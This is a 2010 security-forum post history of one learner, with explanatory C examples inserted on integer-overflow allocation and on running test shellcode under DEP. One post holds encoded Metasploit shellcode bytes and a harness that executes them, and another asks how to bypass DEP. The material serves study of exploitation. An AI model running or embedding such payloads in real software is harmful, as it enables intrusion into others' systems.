  Show Posts
196  Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: Bank Security on: February 19, 2010, 09:44:19 AM
Or you can try to rob an Indian bank like this one:

http://www.youtube.com/watch?v=ZNT94X5SXvE

It will be way easier.

That's awesome! Love it how he grabs the card from the other side.

Uhm, they would probably use lots of cameras and motion detectors. Maybe the guards will have shotguns and experimentally bred three-headed guard dogs with codename Cerberus.

ZF
197  Ethical Hacking Discussions and Related Certifications / Programming / Re: a.out file in backtrack 4 on: February 19, 2010, 04:59:11 AM
Well when you compile C source code with the GCC compiler and don't specify the output file it will get the default name "a.out".

It's a binary executable file that you can run with the command "./a.out".
I'm not sure where you got this file from, so I would suggest opening it in an editor and see if you can get any hints from that.

ZF
198  Ethical Hacking Discussions and Related Certifications / Wireless / Re: cracking wpa on: February 17, 2010, 08:17:49 AM
From what I've heard and read I believe WPA-PSK is the easiest to crack using a dictionary attack with a really good wordlist.

Maybe this article will help you understand things.

http://www.smallnetbuilder.com/wireless/wireless-howto/30278-how-to-crack-wpa--wpa2

Even found an article that talks about cracking WPA in 15 minutes lol.

http://www.pcworld.com/article/153396/.html?tk=rss_news

ZF
199  Ethical Hacking Discussions and Related Certifications / Malware / Re: New Russian Botnet Tries to Kill Its Larger Rival on: February 17, 2010, 07:26:53 AM
Wow, I never knew stuff like this happened. It's like a Trojan war. Sounds like a pretty advanced trojan too, I would probably be proud of it lol.

ZF
200  Ethical Hacking Discussions and Related Certifications / Programming / Question about buffer overflow example. on: February 17, 2010, 07:16:17 AM
Guys, I have a question about the following example from "19 Deadly Sins of Software Security". This is the only example I'm having trouble with, I just want to make sure I fully understand.

Quoted from page 7 of the book:

Quote
The following overrun is a little more interesting:

Code:
bool CopyStructs(InputFile* pInFile, unsigned long count)
{
    unsigned long i;

    // Vulnerable by design: new[] computes sizeof(Structs) * count, and a
    // user-supplied count can make that product wrap to a small allocation.
    m_pStructs = new Structs[count];

    for(i = 0; i < count; i++)
    {
        if(!ReadFromFile(pInFile, &(m_pStructs[i])))
            break;
    }
    return i == count; // the book's snippet omits the return; added so it compiles as bool
}

How can this fail? Consider that when you call the C++ new[] operator, it is similar to the following code:

ptr = malloc(sizeof(type) * count);

If the user supplies the count, it isn't hard to specify a value that overflows the multiplication operation internally. You'll then allocate a buffer much smaller than you need, and the attacker is able to write over your buffer. The upcoming C++ compiler in Microsoft Visual Studio 2005 contains an internal check to prevent this problem.

Is it because the count value that will be used to calculate the buffer's size can be too long? Will the size of the actual buffer be truncated to something smaller while count remains the same?

So I wrote something to test a few theories.

Code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main()
{
    const unsigned long COUNT = 18446744073709551615; // Biggest possible unsigned long on my system.
    char* buf = new char[COUNT];

    printf("Count: %lu\n", COUNT);
    // buf is never initialized, so strlen() scans whatever the heap happens to contain.
    printf("Strlen: %lu\n", (unsigned long)strlen(buf));

    unsigned long i;
    for(i = 0; i < COUNT; i++)
    {
        buf[i] = 'A';
    }
    return 0;
}

Debugging this gives me the following error:
"error C2148: total size of array must not exceed 0x7fffffff". The hex value 0x7fffffff equals 2147483647 in decimal, which is the biggest possible value of a signed int.

When I change the count from 18446744073709551615 to 99999999999999999 I get the following output:

Count: 1569325055
Strlen: 1569325059

What, no errors? So obviously the new operator doesn't like to get unsigned long values. And it does indeed create a smaller buffer, but ALSO adjusts the value of count, so that overflows don't occur in the for loop. Even when count was declared as constant. Is this because of the internal check the compiler performed? Will it just throw the C2148 error? Is this what the author was talking about?


Maybe I'm making things too complicated for myself.

Edit: Ugh, so I found out the Visual C++ compiler treats unsigned longs as 4 bytes. So they're like unsigned ints. I can imagine the risk when you think you're dealing with 8 bytes instead of 4.

ZF
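The size wrap the book describes, as an added C example written for this page (it is not code from the book or from the post). It assumes a hypothetical 64-byte `Structs` record and uses an in-memory byte buffer in place of `InputFile`/`ReadFromFile`; `malloc(sizeof(Structs) * count)` plays the role of `new Structs[count]`. It shows the unchecked product wrapping to 0 bytes (and to 64 bytes for a 32-bit size, the MSVC case where unsigned long is 4 bytes), and a `copy_structs` that refuses any `count` for which the product would not fit:

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical record type standing in for the book's `Structs`. */
typedef struct {
    uint8_t payload[64];
} Structs;

/* The byte count the vulnerable snippet hands to the allocator. `new
 * Structs[count]` computes sizeof(Structs) * count in the unsigned size
 * type, which silently wraps modulo 2^N when the product does not fit. */
size_t unchecked_alloc_size(size_t count)
{
    return sizeof(Structs) * count;
}

/* Same computation with a 32-bit size, as on a 32-bit MSVC build where
 * unsigned long is 4 bytes: 0x04000001 * 64 = 0x100000040 -> 0x40. */
uint32_t unchecked_alloc_size32(uint32_t count)
{
    return (uint32_t)sizeof(Structs) * count;
}

/* Overflow-checked size: returns 1 and stores the byte count, or returns 0
 * when sizeof(Structs) * count would wrap. The division happens before
 * the multiplication, so the check itself cannot overflow. */
int checked_alloc_size(size_t count, size_t *bytes)
{
    if (count > SIZE_MAX / sizeof(Structs))
        return 0;
    *bytes = sizeof(Structs) * count;
    return 1;
}

/* Hardened CopyStructs. `file`/`file_len` stand in for InputFile and
 * ReadFromFile (a read fails when the file runs out, like the book's
 * break). Returns the number of records copied into *out, or -1 when
 * `count` is rejected or the allocation fails; nothing is allocated then. */
long copy_structs(const uint8_t *file, size_t file_len, size_t count,
                  Structs **out)
{
    size_t bytes, i;
    Structs *arr;

    *out = NULL;
    if (!checked_alloc_size(count, &bytes))
        return -1;
    arr = malloc(bytes);
    if (bytes != 0 && arr == NULL)
        return -1;

    for (i = 0; i < count; i++) {
        /* i < count <= SIZE_MAX / sizeof(Structs), so this cannot wrap. */
        if ((i + 1) * sizeof(Structs) > file_len)
            break;
        memcpy(&arr[i], file + i * sizeof(Structs), sizeof(Structs));
    }
    *out = arr;
    return (long)i;
}

int main(void)
{
    uint8_t file[128];               /* constructed "file": exactly two records */
    Structs *recs;
    size_t huge = SIZE_MAX / sizeof(Structs) + 1;

    memset(file, 0xAB, sizeof file);

    printf("count=%zu -> %zu bytes requested\n", huge, unchecked_alloc_size(huge));
    printf("32-bit: count=0x04000001 -> %u bytes requested\n",
           (unsigned)unchecked_alloc_size32(0x04000001u));

    printf("copy 3 records from a 2-record file: %ld copied\n",
           copy_structs(file, sizeof file, 3, &recs));
    free(recs);
    printf("copy %zu records: %ld (rejected before allocating)\n",
           huge, copy_structs(file, sizeof file, huge, &recs));
    return 0;
}
```

The wrap is silent: with 64-byte records, `count = 0x04000001` asks a 32-bit allocator for exactly 64 bytes, and the loop then tries to write 67,108,865 records into them. The fix is the division check before the multiplication; glibc's `calloc()` performs the same check internally, plain `malloc()` does not, and the book's remark about Visual Studio 2005 refers to the compiler adding it for `new[]`.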

201  Ethical Hacking Discussions and Related Certifications / Programming / Re: Testing shellcode in C/C++ on: February 15, 2010, 09:08:03 AM
Never mind, guys, I found the solution. Apparently the "Data Execution Prevention" or DEP kicked in, preventing code from running in the non-executable memory regions.

Compiling with "/NXCOMPAT:NO" prevents this from happening. Now I can finally test my shellcode.

Btw, does anyone know how to bypass this? Will DEP render all buffer overflow exploits useless?

ZF
202  Ethical Hacking Discussions and Related Certifications / Programming / Testing shellcode in C/C++ on: February 15, 2010, 07:56:09 AM
Instead of using shellcode from generators etc, I decided to learn how to write shellcode myself. So the first step would be writing something that can test the shellcode before I attempt to use it in exploits.

I googled around a bit and found a few C/C++ examples of how to do it. It makes use of a function pointer that points to the shellcode buffer. Well I keep getting an exception about some access violation. I don't really like to ask questions, because maybe I should google around some more and find out on my own. I'm not sure if there's something wrong with the shellcode because I don't know how to write it yet.

Here's my code, I compiled it with Microsoft Visual C++ 2008.

Code:
#include <stdio.h>

// The x86 shellcode to run. Generated with Metasploit.
char shellCode[] =
"\xbf\x83\xaf\xc1\xb7\xdb\xca\xd9\x74\x24\xf4\x31\xc9\xb1\x32"
"\x58\x31\x78\x12\x03\x78\x12\x83\x6b\x53\x23\x42\x97\x44\x2d"
"\xad\x67\x95\x4e\x27\x82\xa4\x5c\x53\xc7\x95\x50\x17\x85\x15"
"\x1a\x75\x3d\xad\x6e\x52\x32\x06\xc4\x84\x7d\x97\xe8\x08\xd1"
"\x5b\x6a\xf5\x2b\x88\x4c\xc4\xe4\xdd\x8d\x01\x18\x2d\xdf\xda"
"\x57\x9c\xf0\x6f\x25\x1d\xf0\xbf\x22\x1d\x8a\xba\xf4\xea\x20"
"\xc4\x24\x42\x3e\x8e\xdc\xe8\x18\x2f\xdd\x3d\x7b\x13\x94\x4a"
"\x48\xe7\x27\x9b\x80\x08\x16\xe3\x4f\x37\x97\xee\x8e\x7f\x1f"
"\x11\xe5\x8b\x5c\xac\xfe\x4f\x1f\x6a\x8a\x4d\x87\xf9\x2c\xb6"
"\x36\x2d\xaa\x3d\x34\x9a\xb8\x1a\x58\x1d\x6c\x11\x64\x96\x93"
"\xf6\xed\xec\xb7\xd2\xb6\xb7\xd6\x43\x12\x19\xe6\x94\xfa\xc6"
"\x42\xde\xe8\x13\xf4\xbd\x66\xe5\x74\xb8\xcf\xe5\x86\xc3\x7f"
"\x8e\xb7\x48\x10\xc9\x47\x9b\x55\x25\x02\x86\xff\xae\xcb\x52"
"\x42\xb3\xeb\x88\x80\xca\x6f\x39\x78\x29\x6f\x48\x7d\x75\x37"
"\xa0\x0f\xe6\xd2\xc6\xbc\x07\xf7\xa4\x23\x94\x9b\x2a";

int main()
{
    void (*shell)(); // Function pointer.
    shell = (void(*)()) (&shellCode);

    printf("Shellcode at: %p\n", shellCode);
    printf("Function pointer points to: %p\n", shell);

    // Run it!
    printf("Running shellcode...\n");
    shell();

    return 0;
}


And I'm getting this from the assembly. I see it fails after the call to the shellcode.

Code:
                // Run it!
                shell();
008813FC 8B F4            mov         esi,esp
008813FE FF 55 F8         call        dword ptr [shell]
breaks here --> 00881401 3B F4            cmp         esi,esp
00881403 E8 33 FD FF FF   call        @ILT+310(__RTC_CheckEsp) (88113Bh)


I hope you guys can help me! Or at least point me in the right direction. Thanks in advance.

ZF
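Why the posted harness faults, and the usual fix, as an added C example for the two shellcode posts above (it is not code from the posts). `char shellCode[]` lives in the executable's writable data section, which DEP/NX maps without execute permission, so `call dword ptr [shell]` transfers control to a non-executable page and the CPU raises the access violation. Rather than linking with `/NXCOMPAT:NO`, copy the bytes into memory you mark executable yourself. This version is for Linux (`mmap`/`mprotect`; the Windows equivalents are `VirtualAlloc`/`VirtualProtect` with `PAGE_EXECUTE_READ`) and uses a constructed test payload that only returns 42, not the Metasploit payload from the post; the x86 and AArch64 byte encodings are the standard ones for `mov eax,42; ret` and `mov w0,#42; ret`:

```c
#define _GNU_SOURCE
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

/* Constructed test payloads: each just returns 42 to the caller, so the
 * harness can check that the bytes really executed. */
#if defined(__x86_64__) || defined(__i386__)
static const unsigned char test_shellcode[] = {
    0xb8, 0x2a, 0x00, 0x00, 0x00,   /* mov eax, 42 */
    0xc3                            /* ret         */
};
#elif defined(__aarch64__)
static const unsigned char test_shellcode[] = {
    0x40, 0x05, 0x80, 0x52,         /* mov w0, #42 */
    0xc0, 0x03, 0x5f, 0xd6          /* ret         */
};
#else
#error "no test payload for this architecture"
#endif

/* Copy `len` bytes of code into a fresh anonymous mapping, flip it to
 * read+execute (never writable and executable at the same time), and call
 * it as int (*)(void). Returns the payload's return value, or -1 if the
 * mapping could not be created or protected. */
int run_shellcode(const unsigned char *code, size_t len)
{
    void *mem = mmap(NULL, len, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED)
        return -1;
    memcpy(mem, code, len);

    /* W^X: drop write before adding execute. This is the step the posted
     * harness lacks; its buffer stays in the RW, non-executable .data page. */
    if (mprotect(mem, len, PROT_READ | PROT_EXEC) != 0) {
        munmap(mem, len);
        return -1;
    }
    /* Needed on architectures with separate instruction/data caches. */
    __builtin___clear_cache((char *)mem, (char *)mem + len);

    union { void *obj; int (*fn)(void); } u;  /* avoids object->function cast warnings */
    u.obj = mem;
    int rc = u.fn();

    munmap(mem, len);
    return rc;
}

int main(void)
{
    printf("payload returned %d\n",
           run_shellcode(test_shellcode, sizeof test_shellcode));
    return 0;
}
```

Keeping the page RW while writing and RX while running is the same discipline a JIT follows, and it works with DEP left on. DEP does not make memory-corruption exploits useless either; it forces the attacker to reuse code that is already executable (return-to-libc, return-oriented programming) instead of jumping into injected bytes.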
203  Ethical Hacking Discussions and Related Certifications / OS / Re: Windows 7 on: February 15, 2010, 06:46:59 AM
Well I think it's pretty good. I've been using Win XP for ages and didn't really want to upgrade at first. Windows 7 is probably a bit slower, but I like all the features it offers and of course it's more visually appealing. It still seems to be faster than Vista at least. My hardware is pretty good so I didn't really notice a difference in performance. I thought Windows 7 booted a bit slower, but most of my applications seem to load faster.

Also Windows 7 automatically found all my drivers and gives me the updates for them. Every time I install XP for someone I have to search the internet for the right drivers, because the person lost all his CDs and backups.

I think this really depends on what you expect from the OS and what your needs are. I use my system for everything, from development to gaming and I've never had a problem with Windows 7.

ZF
204  Ethical Hacking Discussions and Related Certifications / Web Applications / Re: Web Applications PenTesting Methodology on: February 14, 2010, 08:52:58 AM
Well if you're going to audit the source code, then I guess you could scan the code for possibly dangerous functions that perform jobs such as string concatenation, or forms that allow users to upload files to the server. Also find out how the application deals with sessions.

Because you already suspect some XSS and SQL injection vulnerabilities, I would mark all input fields and other possible entry points. Then find out how the code deals with those. Document all your findings, explain the vulnerabilities and how to fix them.

I don't know much about good tools, but I've used Acunetix Web Vulnerability Scanner last year and was very pleased with the results.

You probably figured most of this out already, but I'm just trying to help.

ZF
205  Resources / Mass Media / Re: Good hacker movies? on: February 13, 2010, 04:39:31 PM
Alright! Thanks guys.

I'll watch Sneakers and Die Hard 4 tonight.

Then I'll check some of the other movies tomorrow when I find time.

I've been wanting to watch '24' but I always end up watching something else lol.

ZF
206  Resources / Mass Media / Good hacker movies? on: February 13, 2010, 10:00:39 AM
Hey guys,

I was just wondering if anyone knows some good movies that involve hacking and maybe some espionage.

I've seen Hackers and Swordfish. I kinda liked Swordfish and I find Hackers a bit lame but still entertaining.

ZF
207  EH-Net / News Items and General Discussion About EH-Net / Re: Hey I'm new :P on: February 12, 2010, 12:31:16 PM
Thanks for the welcomes!

Well as for college, maybe I should have mentioned that I'm almost done with it. I have some exams to pass and then I'll be doing my final internship or whatever it's called. I still have to apply somewhere but hopefully they will appreciate the work and offer me a job. I kinda regret fooling around a lot and not paying attention to classes.

I'm not sure if I want to become a developer or do something with security. I can always make either one of them a hobby. Or end up doing both anyway.

Thanks again, this really seems to be a nice place.

ZF
208  EH-Net / News Items and General Discussion About EH-Net / Hey I'm new :P on: February 12, 2010, 10:13:49 AM
Hello guys,

Just thought I'd post here and introduce myself. Well I'm 24 years old and I live in the Netherlands. I've always been fascinated by computers, technologies and weird theories such as time travel lol. I'm still at college because I skip any class that seems boring to me and generally don't pay much attention anyhow (maybe I'm a bit of an ADD person). So I failed a couple of times, oh well. I'm mostly interested in programming, security and a bit of networking (though I find Cisco classes very boring).

I started learning stuff about security about one year ago: buffer overflows, SQL injection, etc. Feels like I've learned a lot, but there's still way too much that I don't even have a clue about. So I started looking into reverse engineering and cryptography, which will hopefully improve my chance of actually finding new security holes.

I've come to realize that I'm doing all the research and studying on my own and never actually talk about it with others. Maybe I should be part of a community or something, not sure. Wanting to reach the next level and maybe someday make a living out of it.


ZF

© 2013 The Ethical Hacker Network